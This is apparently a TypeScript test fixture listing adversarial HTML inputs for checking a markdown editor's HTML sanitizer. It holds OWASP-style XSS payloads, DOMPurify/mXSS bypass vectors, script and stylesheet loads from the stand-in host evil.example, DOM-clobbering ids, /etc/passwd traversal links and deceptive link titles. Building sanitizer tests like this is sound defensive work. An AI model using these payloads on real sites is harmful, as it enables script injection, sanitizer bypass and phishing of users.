/**
 * Suíte adversarial do HTML cru (R-I10.5, AC-I10.2/AC-I10.3; arch-frontend r7 §8). Cada vetor é
 * UMA linha sem linha em branco (vira um bloco/parágrafo próprio numa nota). Fontes: folha de XSS
 * da OWASP, histórico de desvios do DOMPurify e mXSS, confusão de namespace SVG/MathML,
 * `<noscript>`/`<template>`, `javascript:` com entidades/espaços/caixa mista, `data:text/html`,
 * `<img onerror>`, `<style>@import`, `<base>`, `<meta http-equiv=refresh>`, `<form action>`,
 * sobreposição por `style`, `class="smd-dialog"`, `id`/`name` que colidem com globais. Toda
 * execução tentada escreve em `window.__xss` (o harness confere a bandeira); toda busca vai para
 * `evil.example` (o harness confere 0 requisições).
 */
export const HTML_ADVERSARIAL: readonly string[] = [
  // --- OWASP XSS Filter Evasion Cheat Sheet ---
  '<script>window.__xss=1</script>',
  '<SCRIPT SRC=https://evil.example/xss.js></SCRIPT>',
  '<IMG SRC="javascript:window.__xss=1;">',
  '<IMG SRC=JaVaScRiPt:window.__xss=1>',
  '<IMG SRC=`javascript:window.__xss=1`>',
  '<a onmouseover="window.__xss=1">xxs link</a>',
  '<IMG """><SCRIPT>window.__xss=1</SCRIPT>"\\>',
  '<IMG SRC=/ onerror="window.__xss=1"></img>',
  '<img src=x onerror="&#0000119&#0000105&#0000110&#0000100&#0000111&#0000119&#0000046&#0000095&#0000095&#0000120&#0000115&#0000115&#0000061&#0000049">',
  '<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>',
  '<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>',
  '<IMG SRC="jav\tascript:window.__xss=1;">',
  '<IMG SRC="jav&#x09;ascript:window.__xss=1;">',
  '<IMG SRC="jav&#x0A;ascript:window.__xss=1;">',
  '<IMG SRC=" &#14;  javascript:window.__xss=1;">',
  '<SCRIPT/XSS SRC="https://evil.example/xss.js"></SCRIPT>',
  '<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=window.__xss=1>',
  '<<SCRIPT>window.__xss=1;//\\<</SCRIPT>',
  '<SCRIPT SRC=https://evil.example/xss.js?< B >',
  '<IMG SRC="`<javascript:window.__xss=1>`">',
  '</TITLE><SCRIPT>window.__xss=1;</SCRIPT>',
  '<INPUT TYPE="IMAGE" SRC="javascript:window.__xss=1;">',
  '<BODY BACKGROUND="javascript:window.__xss=1">',
  '<IMG DYNSRC="javascript:window.__xss=1">',
  '<IMG LOWSRC="javascript:window.__xss=1">',
  '<STYLE>li {list-style-image: url("javascript:window.__xss=1");}</STYLE><UL><LI>XSS</br>',
  '<svg/onload=window.__xss=1>',
  '<BGSOUND SRC="javascript:window.__xss=1;">',
  '<LINK REL="stylesheet" HREF="javascript:window.__xss=1;">',
  '<LINK REL="stylesheet" HREF="https://evil.example/xss.css">',
  "<STYLE>@import'https://evil.example/xss.css';</STYLE>",
  '<META HTTP-EQUIV="Link" Content="<https://evil.example/xss.css>; REL=stylesheet">',
  '<STYLE>BODY{-moz-binding:url("https://evil.example/xssmoz.xml#xss")}</STYLE>',
  '<IMG STYLE="xss:expr/*XSS*/ession(window.__xss=1)">',
  '<STYLE TYPE="text/javascript">window.__xss=1;</STYLE>',
  '<STYLE>.XSS{background-image:url("javascript:window.__xss=1");}</STYLE><A CLASS=XSS></A>',
  '<STYLE type="text/css">BODY{background:url("https://evil.example/bg.png")}</STYLE>',
  '<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:window.__xss=1;">',
  '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD53aW5kb3cuX194c3M9MTwvc2NyaXB0Pg">',
  '<IFRAME SRC="javascript:window.__xss=1;"></IFRAME>',
  '<IFRAME SRC=# onmouseover="window.__xss=1"></IFRAME>',
  '<FRAMESET><FRAME SRC="javascript:window.__xss=1;"></FRAMESET>',
  '<TABLE BACKGROUND="javascript:window.__xss=1"><tr><td>t</td></tr></TABLE>',
  '<TABLE><TD BACKGROUND="https://evil.example/bg.png">td</TD></TABLE>',
  '<DIV STYLE="background-image: url(javascript:window.__xss=1)">bg</DIV>',
  '<DIV STYLE="background-image:\\0075\\0072\\006C\\0028\'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029\'\\0029">esc</DIV>',
  '<DIV STYLE="width: expression(window.__xss=1);">expr</DIV>',
  '<BASE HREF="javascript:window.__xss=1;//">',
  '<OBJECT TYPE="text/x-scriptlet" DATA="https://evil.example/scriptlet.html"></OBJECT>',
  '<EMBED SRC="data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9IndpbmRvdy5fX3hzcz0xIi8+" type="image/svg+xml" AllowScriptAccess="always"></EMBED>',
  // --- `javascript:`/`data:`/esquemas com entidades, espaços e caixa mista ---
  '<a href="javascript&colon;window.__xss=1">colon</a>',
  '<a href="jav&#x61;script:window.__xss=1">hex</a>',
  '<a href="&#x6A;avascript:window.__xss=1">hex0</a>',
  '<a href=" javascript:window.__xss=1">space</a>',
  '<a href="java&#0;script:window.__xss=1">nul</a>',
  '<a href="data:text/html;base64,PHNjcmlwdD53aW5kb3cuX194c3M9MTwvc2NyaXB0Pg==">data</a>',
  '<a href="vbscript:msgbox(1)">vb</a>',
  '<a href="livescript:window.__xss=1">live</a>',
  '<a href="file:///etc/passwd">file</a>',
  '<a href="//evil.example/x">protocol-relative</a>',
  '<a href="\\\\evil.example\\share">unc</a>',
  '<a href="https://user:pass@evil.example/">credenciais</a>',
  '<a href="  JAVASCRIPT:window.__xss=1">upper</a>',
  '<a href="j&#97;v&#97;script&#x3A;window.__xss=1">ent</a>',
  '<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;window.__xss=1">dec</a>',
  '<a href="https://exemplo.org/\u202Eevil">bidi</a>',
  // --- imagens, mídia e formulários ---
  '<img src="data:image/svg+xml,<svg onload=window.__xss=1>">',
  '<img src="https://evil.example/pixel.png" alt="remota">',
  '<img src="//evil.example/pixel.png" alt="relativa ao esquema">',
  '<img srcset="https://evil.example/a.png 1x" src="img/bandeira.png" alt="srcset">',
  '<img src="img/bandeira.png" onload="window.__xss=1" alt="onload">',
  '<img src="../../../../etc/passwd.png" alt="fora do vault">',
  '<img src=".git/config.png" alt="git">',
  '<image src=x onerror=window.__xss=1>',
  '<img src=x:alert(1) onerror=eval(src)>',
  '<form action="https://evil.example"><input name="q"><button formaction="javascript:window.__xss=1">go</button></form>',
  '<button onclick="window.__xss=1">botão</button>',
  '<textarea autofocus onfocus="window.__xss=1">t</textarea>',
  '<select autofocus onfocus="window.__xss=1"><option>o</option></select>',
  '<input autofocus onfocus="window.__xss=1">',
  '<video><source onerror="window.__xss=1"></video>',
  '<audio src="https://evil.example/a.mp3" autoplay onerror="window.__xss=1"></audio>',
  '<video src="https://evil.example/v.mp4" poster="https://evil.example/p.png" autoplay></video>',
  '<details open ontoggle="window.__xss=1"><summary>s</summary>x</details>',
  '<marquee onstart="window.__xss=1">m</marquee>',
  '<object data="javascript:window.__xss=1"></object>',
  '<canvas id="tela"></canvas>',
  '<isindex action="javascript:window.__xss=1" type=image>',
  '<keygen autofocus onfocus="window.__xss=1">',
  '<portal src="https://evil.example"></portal>',
  '<applet code="x"></applet>',
  '<iframe srcdoc="<script>parent.__xss=1</script>"></iframe>',
  '<a href="https://exemplo.org" ping="https://evil.example/ping">ping</a>',
  // --- mXSS e desvios históricos do DOMPurify ---
  '<svg></p><style><a id="</style><img src=1 onerror=window.__xss=1>">',
  '<svg><p><style><img src=1 onerror=window.__xss=1>',
  '<math><mtext><table><mglyph><style><img src=x onerror=window.__xss=1>',
  '<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;/mglyph&gt;&lt;img&Tab;src=1&Tab;onerror=window.__xss=1&gt;">',
  '<form><math><mtext></form><form><mglyph><style></math><img src onerror=window.__xss=1>',
  '<noscript><p title="</noscript><img src=x onerror=window.__xss=1>">',
  '<template><script>window.__xss=1</script></template>',
  '<template><img src=x onerror=window.__xss=1></template>',
  '<svg><style><img src=x onerror=window.__xss=1></style></svg>',
  '<math><style><img src=x onerror=window.__xss=1></style></math>',
  '<svg><foreignObject><img src=x onerror=window.__xss=1></foreignObject></svg>',
  '<svg><a xlink:href="javascript:window.__xss=1"><text x="20" y="20">X</text></a></svg>',
  '<svg><animate attributeName="href" values="javascript:window.__xss=1"/><a><text>x</text></a></svg>',
  '<svg><set attributeName="onmouseover" to="window.__xss=1"/></svg>',
  '<math href="javascript:window.__xss=1">CLICK</math>',
  '<math><maction actiontype="statusline" xlink:href="javascript:window.__xss=1">x</maction></math>',
  '<a href="javascript:window.__xss=1"><svg><image href="https://evil.example/x.png"/></svg></a>',
  '<svg><script>window.__xss=1</script></svg>',
  '<svg><script href="data:,window.__xss=1"/></svg>',
  '<math><a xlink:href="javascript:window.__xss=1">m</a></math>',
  '<xmp><img src=x onerror=window.__xss=1></xmp>',
  '<title><img src=x onerror=window.__xss=1></title>',
  '<textarea><img src=x onerror=window.__xss=1></textarea>',
  '<noembed><img src=x onerror=window.__xss=1></noembed>',
  '<noframes><img src=x onerror=window.__xss=1></noframes>',
  '<!--<img src=x onerror=window.__xss=1>-->',
  '<!-- --!><img src=x onerror=window.__xss=1> -->',
  '<?xml version="1.0"?><img src=x onerror=window.__xss=1>',
  '<![CDATA[<img src=x onerror=window.__xss=1>]]>',
  '<div><svg><desc><img src=x onerror=window.__xss=1></desc></svg></div>',
  '<table><tr><td><svg><p><style><img src=x onerror=window.__xss=1></style></svg></td></tr></table>',
  '<a href="https://exemplo.org"><svg><a xlink:href="javascript:window.__xss=1"><text>t</text></a></svg></a>',
  // --- clobbering e classes/ids do app ---
  '<div id="__proto__">p</div>',
  '<img name="getElementById">',
  '<form id="location"><input name="href"></form>',
  '<a id="defaultView" name="cookie" href="https://exemplo.org">c</a>',
  '<div class="smd-dialog" role="dialog">falso diálogo</div>',
  '<div class="cm-content smd-shell">classe do app</div>',
  '<span id="__simplemdHarness" name="harness">id global</span>',
  '<img id="currentScript" src="img/bandeira.png" alt="cs">',
  // --- sobreposição e fuga da caixa por `style`/atributos ---
  '<div style="position:fixed;inset:0;z-index:99999;background:white">cobre</div>',
  '<div style="transform:translateY(-500px)">sobe</div>',
  '<div style="width:100000px;height:100000px">gigante</div>',
  '<div style="margin-top:-9999px">margem</div>',
  '<span style="color:red;background:url(https://evil.example/x.png)">fundo</span>',
  '<span style="background-color: image-set(url(https://evil.example/x.png) 1x)">image-set</span>',
  '<span style="color: red; behavior: url(x.htc)">htc</span>',
  '<span style="color: \\72 ed">escape</span>',
  '<span style="color: var(--color-accent)">var</span>',
  '<span style="color: red !important">important</span>',
  '<span style="font-family: x; @import \'https://evil.example/x.css\'">at</span>',
  '<p style="text-align:center" align="left" width="99999999">largura</p>',
  '<img src="img/bandeira.png" width="99999" height="1" alt="largura">',
  '<table width="100000"><tr><td>t</td></tr></table>',
  '<div aria-hidden="true" data-x="1" tabindex="0" accesskey="x" contenteditable="true" draggable="true" hidden>atributos</div>',
  '<a href="https://exemplo.org" target="_top" rel="opener">alvo</a>',
  '<details><summary onclick="window.__xss=1">s</summary></details>',
  '<ol type="javascript:x" start="1e9" reversed="x"><li>a</li></ol>',
  '<table><tr><th scope="javascript:x" abbr="<script>">h</th></tr></table>',
  '<blockquote cite="javascript:window.__xss=1">q</blockquote>',
  '<q cite="https://evil.example">q</q>',
  '<ins datetime="x" cite="javascript:1">i</ins>',
  // --- conteúdo de fluxo em linha e tinta fora da linha (CR-S10-03, S10-SEC-01/02) ---
  'x <table width="9999%" height="9999"><tr><td width="9999" height="9999">t</td></tr></table> y',
  'x <div>bloco</div> y',
  'x <details open><summary>s</summary>corpo</details> y',
  'x <span style="text-decoration: underline 300px rgb(255 0 0)">u</span> y',
  'x <span style="text-decoration: overline 3000px rgb(255 0 0)">o</span> y',
  'x <span style="text-decoration: line-through 100%">l</span> y',
  'x <mark style="text-decoration: underline wavy 200px red">w</mark> y',
  'x <sub><sub><sub><sub><sub><sub><sub><sub>fundo</sub></sub></sub></sub></sub></sub></sub></sub> y',
  // --- links: dica falsa e destino fora do vault (S10-SEC-03, S10-SEC-06) ---
  '<a href="https://evil.example/login" title="https://banco.example">banco</a>',
  '<a href="https://evil.example/login"><span title="https://banco.example">banco</span></a>',
  '<a href="../../../../etc/passwd">passwd</a>',
  '<a href="%2e%2e/%2e%2e/%2e%2e/etc/passwd">passwd codificado</a>',
];
